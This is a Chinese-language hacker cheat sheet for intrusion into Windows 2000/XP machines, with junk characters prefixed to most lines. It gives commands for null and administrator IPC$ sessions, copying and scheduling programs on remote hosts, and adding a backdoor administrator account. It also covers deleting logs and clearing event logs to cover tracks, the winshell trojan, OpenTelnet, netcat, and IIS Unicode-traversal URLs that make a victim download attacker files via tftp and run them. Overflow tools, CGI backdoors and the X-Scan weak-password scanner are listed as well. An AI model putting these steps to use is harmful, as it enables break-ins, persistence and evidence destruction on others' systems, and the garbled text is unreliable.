网管和黑客都必须知道的命令
_3zJ.% 常用的几条NET命令:
BY>]6SrP VfkQc$/ (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
u-@;Q<v$ u]sxX") (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
/5y _ < <6.?:Jj (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
IubzHf dZuPR (查看远程主机时间) net time \\IP地址
21z@-&Oq 8f>v[SQ" (定时启动某个程序) at \\IP地址 02:18 readme.exe
g5lK&-yu] F0ylJ
/E (查看共享) net view \\IP地址
zuI7Px K)GpQ|4:< (查看netbios工作组列表) nbtstat -A IP地址
)0zg1z vQ8$C 3 (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
#@m6ag. S2:G#%EAa (这两条把自己增加到管理员组): net user 用户名 密码 /add
ufo\p=pGG \|6Q]3l net localgroup Administrators 用户名 /add
^f9>tI{ E&>;a!0b] (断开连接) net use \\IP地址\ipc$ /delete
~(]'ah, g=jB'h? 扫尾:
*0Wkz'=U q@i.4>x del C:\winnt\system32\logfiles\*.*
?f:ND1jU F%$lcQ04% del C:\winnt\ssytem32\config\*.evt
Lw`}o` D p~OX1RBI del C:\winnt\system32\dtclog\*.*
f('##pND@ `$ pJ2S del C:\winnt\system32\*.log
.F3~eas Z/LYTo$Bz del C:\winnt\system32\*.txt
+de5y]1H,| zS'{F>w del C:\winnt\*.txt
<7o@7r'0 c=<^pCa9t1 del C:\winnt\*.log
kv`5"pa7M CN7qqd 一、netsvc.exe
dfs1BV' /_r{7Gq. 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
Job&qW9W` `;&=m,
W' netsvc /list \\IP地址
;
. hTfxE0 >Yfo $S_ netsvc schedule \\IP地址 /query
#e6x_o| >IHf5})R netsvc \\IP地址 schedule /start
F-Ywl) yJw4!A 1! 二、OpenTelnet.exe
42 Sk` <@=w4\5j9 远程启动主机的Telnet服务,并绑定端口到7878,例如:
[q!)Y:|u_> 62#8c~dL OpenTelnet \\IP地址 用户名 密码 1 7878
UbSD?Ew@35 e{d$OzT) V 然后就可以telnet到主机的7878端口,进入DOS方式下:
zuvP\Y=V` =Lr#
*ep[ telnet IP地址 7878
sUsIu,1Q XPcx"zv\ 三、winshell.exe
BO;LK-V m`/!7wQs 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
[
]=}0l<J )>a^%V9 p Path (查看winshell主程序的路径信息)
9wv 7HD| ; J8 25CE b reBoot (重新启动机器)
/ee4 v! 5VW*h d shutDown (关闭机器)
cin3)lm CB?,[#r5f s Shell (执行后你就会看到可爱的“C:\>”)
,T7(!)dR ;,:w%. x eXit (退出本次登录会话,此命令并不终止winshell的运行)
6-uB[$ko xr-v"- CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
GZ/vUe WhR'MkfL 四、3389登陆器,GUI方式登录远程主机的
`Yc>I!iN h`/1JjP 五、elsave.exe
gNzamorv[ >zB0+l 事件日志清除工具
JV9Ft,xk ~UV$(5&- elsave -s \\IP地址 -l "application" -C
,Mw;kevw yS(tF`H[ elsave -s \\IP地址 -l "system" -C
00@y,V_] Tta+qjr elsave -s \\IP地址 -l "security" -C
@60/IE{-v -m>ng
E~q 执行后成功清除应用程序日志,系统日志,安全日志
qW:\6aEG &sJ%ur+G 六、hbulot.exe
k/V:QdD Sb S`GM#( t@_ 开启win2kserver和winxp的3389服务
|#-GH$.v j#E&u*IR hbulot [/r]
.\+%Q)?h: 8?&u5 使用/r表示安装完成后自动重起目标使设置生效。
.[4Dvt|>6 tXnD>H YV 七、nc.exe(netcat.exe)
yjxv D Vy[ m%sEP 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
x(/{]$h Vtr5<:eEx 想要连接到某处: nc [-options] hostname port[s] [ports] ...
,,[pc 'VTLp.~G~ 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
#q%V|Ajq x4vowF 参数:
Iib39?D W jVtRn.qh -e prog 程序重定向,一旦连接,就执行 [危险!!]
Lk~aMbw# |}>;wZ[7 -g gateway source-routing hop point[s], up to 8
+sc--e? eDPmUlC+- -G num source-routing pointer: 4, 8, 12, ...
Tp?l;DU vCh/%7+ -h 帮助信息
!DUC#)F %>G(2)Fb\\ -i secs 延时的间隔
H(TY. R2[-Q"|Ra -l 监听模式,用于入站连接
z_LN*u
8Ekk"h6 -n 指定数字的IP地址,不能用hostname
It/IDPx4ga *To5\| -o file 记录16进制的传输
<)
`?s aA-gl9 -p port 本地端口号
JBKCa 3 AGdFJ>/ -r 任意指定本地及远程端口
Z1gZn)7 |4@su"OA -s addr 本地源地址
FX#fh 2 >$yqx1=jW -u UDP模式
C<.Ny,U d;$<K -v 详细输出——用两个-v可得到更详细的内容
_26<}&]b* wA#w]8SM -w secs timeout的时间
4/Yk;X[jk
#H@rb -z 将输入输出关掉——用于扫描时
2/c^3[ccR 八、TFTPD32.EXE
I,@f*o 18AKM 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
-W:te7 l?N|Gj;ZFZ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
!A\Qwg> @,Iyn<v{B 然后可以直接令文件运行:
#Wz7ju; fgW>U*.ar http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
b5MCOW1+ Q3$AL@". 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
/@<&{_sybp VR @V3 ~ 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
12yr_ v^=Po6S[{+ 一、一 Xscan命令行运行参数说明:
Vk/!_) OUd&fUmH 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
bk-veJR ;w/|5 ;{A; 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
<R TAO2 @nuMl5C-` xscan -file <主机列表文件名> <检测项目> [其他选项]
W?n)IBj8 K|q5s]4I 其中<检测项目> 含义如下:
+ti_?gfx g8JO/s5xV -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
^ *{:;F@ 9\_^"5l -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
zJH#J=O Y -Zw' -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
mM> L0 yl>V' -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
X#bK.WN$ 5d7AE^SHsH -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
V!Px975P Md4hd#z [其他选项] 含义如下:
E^)>9f7 JH4hy9i -v: 显示详细扫描进度
H+ P&}
3 qSg#:;(O -p: 跳过Ping不通的主机
z6Xn9 (6Y.|u]bq -o: 跳过没有检测到开放端口的主机
=SUCcdy& a(s%3"*Q -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10